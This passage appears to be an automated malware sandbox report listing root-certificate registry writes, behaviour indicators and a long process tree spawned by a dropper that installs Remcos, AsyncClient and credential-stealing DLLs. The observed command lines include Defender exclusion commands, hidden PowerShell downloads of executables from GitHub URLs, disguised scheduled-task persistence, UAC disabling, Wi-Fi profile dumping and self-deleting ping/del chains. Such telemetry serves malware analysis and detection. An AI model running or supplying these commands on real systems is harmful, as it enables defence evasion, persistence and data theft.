| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A | C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe | N/A |
Runs ping.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
| N/A | N/A | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\xx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\ctx.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\xx.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\x.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\neptuno.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\null.exe | N/A |
| N/A | N/A | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe
"C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe"
C:\Users\Admin\AppData\Local\Temp\a\TestExe.exe
"C:\Users\Admin\AppData\Local\Temp\a\TestExe.exe"
C:\Users\Admin\AppData\Local\Temp\a\x.exe
"C:\Users\Admin\AppData\Local\Temp\a\x.exe"
C:\Users\Admin\AppData\Local\Temp\a\PDFReader.exe
"C:\Users\Admin\AppData\Local\Temp\a\PDFReader.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\x.exe'
C:\Users\Admin\AppData\Local\Temp\a\system32.exe
"C:\Users\Admin\AppData\Local\Temp\a\system32.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'
C:\Users\Admin\AppData\Local\Temp\a\system32.exe
"C:\Users\Admin\AppData\Local\Temp\a\system32.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe
"C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe"
C:\Users\Admin\AppData\Local\Temp\a\Update.exe
"C:\Users\Admin\AppData\Local\Temp\a\Update.exe"
C:\Users\Admin\AppData\Local\Temp\a\main.exe
"C:\Users\Admin\AppData\Local\Temp\a\main.exe"
C:\Users\Admin\AppData\Local\Temp\a\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\a\tmp.exe"
C:\Users\Admin\AppData\Local\Temp\a\main.exe
"C:\Users\Admin\AppData\Local\Temp\a\main.exe"
C:\Users\Admin\AppData\Local\Temp\a\shost.exe
"C:\Users\Admin\AppData\Local\Temp\a\shost.exe"
C:\Users\Admin\AppData\Local\Temp\a\shost.exe
"C:\Users\Admin\AppData\Local\Temp\a\shost.exe"
C:\Users\Admin\AppData\Local\Temp\a\qhos.exe
"C:\Users\Admin\AppData\Local\Temp\a\qhos.exe"
C:\Users\Admin\AppData\Local\Temp\a\qhos.exe
"C:\Users\Admin\AppData\Local\Temp\a\qhos.exe"
C:\Users\Admin\AppData\Local\Temp\a\phost.exe
"C:\Users\Admin\AppData\Local\Temp\a\phost.exe"
C:\Users\Admin\AppData\Local\Temp\a\phost.exe
"C:\Users\Admin\AppData\Local\Temp\a\phost.exe"
C:\Users\Admin\AppData\Local\Temp\a\in.exe
"C:\Users\Admin\AppData\Local\Temp\a\in.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\642F.tmp\6430.tmp\6431.bat C:\Users\Admin\AppData\Local\Temp\a\in.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/arht/releases/download/seht/archive.htm/' -outfile archive.htm"
C:\Users\Admin\AppData\Local\Temp\a\NEOFreeSetup.exe
"C:\Users\Admin\AppData\Local\Temp\a\NEOFreeSetup.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WIS0E7C0CA4E536483D943BE977EA796DD9_1_0_0_182.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\AppData\Local\Temp\a\NEOFreeSetup.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A3AD38B1F37553470F46D4A483762434 C
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/ucm1/releases/download/iu1/shost.exe/' -outfile shost.exe"
C:\Users\Admin\AppData\Local\Temp\a\BWCStartMSI.exe
"C:\Users\Admin\AppData\Local\Temp\a\BWCStartMSI.exe"
C:\Windows\system32\calc.exe
calc.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /q /i BWCInstaller.msi /norestart
C:\Users\Admin\AppData\Local\Temp\a\VipToolMeta.exe
"C:\Users\Admin\AppData\Local\Temp\a\VipToolMeta.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 158922D7BC91519203A8F52E0E575224
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Windows\Installer\MSI8FF8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259625163 1 CustomActions!CustomActions.CustomActions.StartApp
C:\Users\Admin\AppData\Local\Temp\a\TrackYourSentOLSetup.exe
"C:\Users\Admin\AppData\Local\Temp\a\TrackYourSentOLSetup.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\AppData\Local\Temp\a\TrackYourSentOLSetup.exe"
C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe
"C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Windows\Installer\MSI97A6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259627113 7 CustomActions!CustomActions.CustomActions.InstallPing
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding D07DCEDC9FDD00FC43C3050A42B7997D C
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe
"C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\a\Out2.exe
"C:\Users\Admin\AppData\Local\Temp\a\Out2.exe"
C:\Users\Admin\AppData\Local\Temp\a\null.exe
"C:\Users\Admin\AppData\Local\Temp\a\null.exe"
C:\Users\Admin\AppData\Local\Temp\a\neptuno.exe
"C:\Users\Admin\AppData\Local\Temp\a\neptuno.exe"
C:\Users\Admin\AppData\Local\Temp\a\VmManagedSetup.exe
"C:\Users\Admin\AppData\Local\Temp\a\VmManagedSetup.exe"
C:\Users\Admin\AppData\Local\Temp\a\ssg.exe
"C:\Users\Admin\AppData\Local\Temp\a\ssg.exe"
C:\Users\Admin\AppData\Local\Temp\a\xx.exe
"C:\Users\Admin\AppData\Local\Temp\a\xx.exe"
C:\Users\Admin\AppData\Local\Temp\a\cx.exe
"C:\Users\Admin\AppData\Local\Temp\a\cx.exe"
C:\Users\Admin\AppData\Local\Temp\a\AsyncClient.exe
"C:\Users\Admin\AppData\Local\Temp\a\AsyncClient.exe"
C:\Users\Admin\AppData\Local\Temp\a\dropper.exe
"C:\Users\Admin\AppData\Local\Temp\a\dropper.exe"
C:\Users\Admin\AppData\Local\Temp\a\tester.exe
"C:\Users\Admin\AppData\Local\Temp\a\tester.exe"
C:\Users\Admin\AppData\Local\Temp\a\ctx.exe
"C:\Users\Admin\AppData\Local\Temp\a\ctx.exe"
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\vvv.exe
"C:\Users\Admin\AppData\Local\Temp\a\vvv.exe"
C:\Users\Admin\AppData\Local\Temp\a\Out2.exe
"C:\Users\Admin\AppData\Local\Temp\a\Out2.exe"
C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe
"C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe"
C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe
"C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Users\Admin\AppData\Local\Temp\10000880101\ssg.exe
"C:\Users\Admin\AppData\Local\Temp\10000880101\ssg.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\692679935401_Desktop.zip' -CompressionLevel Optimal
C:\Users\Admin\AppData\Local\Temp\a\connect.exe
"C:\Users\Admin\AppData\Local\Temp\a\connect.exe"
C:\Users\Admin\AppData\Local\Temp\a\null.exe
"C:\Users\Admin\AppData\Local\Temp\a\null.exe"
C:\Users\Admin\AppData\Local\Temp\a\AzureConnect.exe
"C:\Users\Admin\AppData\Local\Temp\a\AzureConnect.exe"
C:\Users\Admin\AppData\Local\Temp\a\Javvvum.exe
"C:\Users\Admin\AppData\Local\Temp\a\Javvvum.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\692679935401_Desktop.zip' -CompressionLevel Optimal
C:\Users\Admin\AppData\Local\Temp\a\random.exe
"C:\Users\Admin\AppData\Local\Temp\a\random.exe"
C:\Users\Admin\AppData\Local\Temp\a\client.exe
"C:\Users\Admin\AppData\Local\Temp\a\client.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4068 -s 644
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
"C:\Users\Admin\AppData\Local\Temp\a\l4.exe"
C:\Users\Admin\AppData\Local\Temp\a\tester.exe
"C:\Users\Admin\AppData\Local\Temp\a\tester.exe"
C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
"C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_5024_133786979071188000\l4.exe
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
"C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe
"C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
"C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe
"C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
"C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\system32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\system32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe
"C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\ProgramData\Remcos\remcos.exe
C:\ProgramData\Remcos\remcos.exe
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe
"C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe"
C:\Windows\system32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\system32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\system32\schtasks.exe
schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del gU8ND0g.exe
C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"
C:\Windows\SysWOW64\svchost.exe
svchost.exe
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\a\888.exe
"C:\Users\Admin\AppData\Local\Temp\a\888.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {485DBF57-2597-4ADB-806A-907CE678CD8C} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\System32\certutil.exe
"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp1BFB.tmp"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5972 -s 380
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\SysWOW64\cmd.exe
